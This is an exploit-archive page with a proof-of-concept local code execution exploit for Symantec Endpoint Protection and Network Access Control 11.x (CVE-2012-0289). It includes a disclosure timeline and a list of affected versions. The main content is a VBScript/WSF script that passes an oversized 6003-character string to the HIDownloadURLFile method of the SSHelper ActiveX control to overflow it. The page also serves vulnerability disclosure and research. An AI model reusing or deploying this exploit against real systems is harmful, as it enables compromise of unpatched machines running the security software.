Symantec End Point Protection / Network Access Control 11.x Code Execution

Symantec End Point Protection / Network Access Control 11.x Code Execution: Posted May 23, 2012; Authored by 41.w4r10r; Symantec End Point Protection version 11.x and Symantec Network Access Control version 11.x local code execution proof of concept exploit.; tags | exploit, local, code execution, proof of concept; advisories | CVE-2012-0289; SHA-256 | d2c6c09960003fa18cb090bcea7cbd0573d048ef3bac16353e5db8e15ab33911; Download | Favorite | View

Symantec End Point Protection / Network Access Control 11.x Code Execution

# Symantec End Point Protection 11.x & Symantec Network Access Control 11.x Local Code Execution POC
# Date: 22/05/2012
# Author: 41.w4r10r
# Software Link: Symantec.com
# Version: 11.x
# Tested on:
#   Windows XP SP2 English
#   Windows XP SP3 English
#   Windows Vista 32Bit
#   Windows 7 32Bit
# CVE : CVE-2012-0289
 
Time Line:
30/08/2011 - Sent Details of the vulnerability
31/08/2011 - Symantec Requested Affected Version Details
31/08/2011 - Provided Requested Information with POC
27/09/2011 - Vulnerability Confirmed by Symantec
22/05/2012 - Advisory Released
 
Symantec Advisory:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120522_01
 
Affected Products:
 
Symantec Endpoint Protection
11.0 RU6(11.0.600x)
11.0 RU6-MP1(11.0.6100)
11.0 RU6-MP2(11.0.6200)
11.0 RU6-MP3(11.0.6300)
11.0 RU7(11.0.700x)
11.0 RU7-MP1(11.0.710x)
 
Symantec Network Access Control
11.0 RU6(11.0.600x)
11.0 RU6-MP1(11.0.6100)
11.0 RU6-MP2(11.0.6200)
11.0 RU6-MP3(11.0.6300)
11.0 RU7(11.0.700x)
11.0 RU7-MP1(11.0.710x)
 
Affected Resource:
%%System%%\Symantec\Symantec Endpoint Protection\SSHelper.dll
 
===
POC
===
 
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target' />
<script language='vbscript'>
prototype  = "Function HIDownloadURLFile ( ByVal cookie As Long ,  ByVal
url As String ,  ByVal file_path As String ,  ByVal rule_name As String ,
 ByVal cancel_message As String ,  ByVal downloading_time As Long ,  ByVal
bResume As Boolean ,  ByVal bShowProgressDlg As Boolean ,  ByVal
bAllowCancel As Boolean ,  ByVal username As String ,  ByVal password As
String ,  ByVal show_error_delay As Long ) As Long"
memberName = "HIDownloadURLFile"
progid     = "SSHELPERLib.SSHelper"
argCount   = 12
arg1=1
arg2="defaultV"
arg3="defaultV"
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=True
arg8=True
arg9=True
arg10="defaultV"
arg11= String(6003, "A")
arg12=1
target.HIDownloadURLFile arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8
,arg9 ,arg10 ,arg11 ,arg12
</script></job></package>

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Symantec End Point Protection / Network Access Control 11.x Code Execution

Symantec End Point Protection / Network Access Control 11.x Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Symantec End Point Protection / Network Access Control 11.x Code Execution

Share This

Symantec End Point Protection / Network Access Control 11.x Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems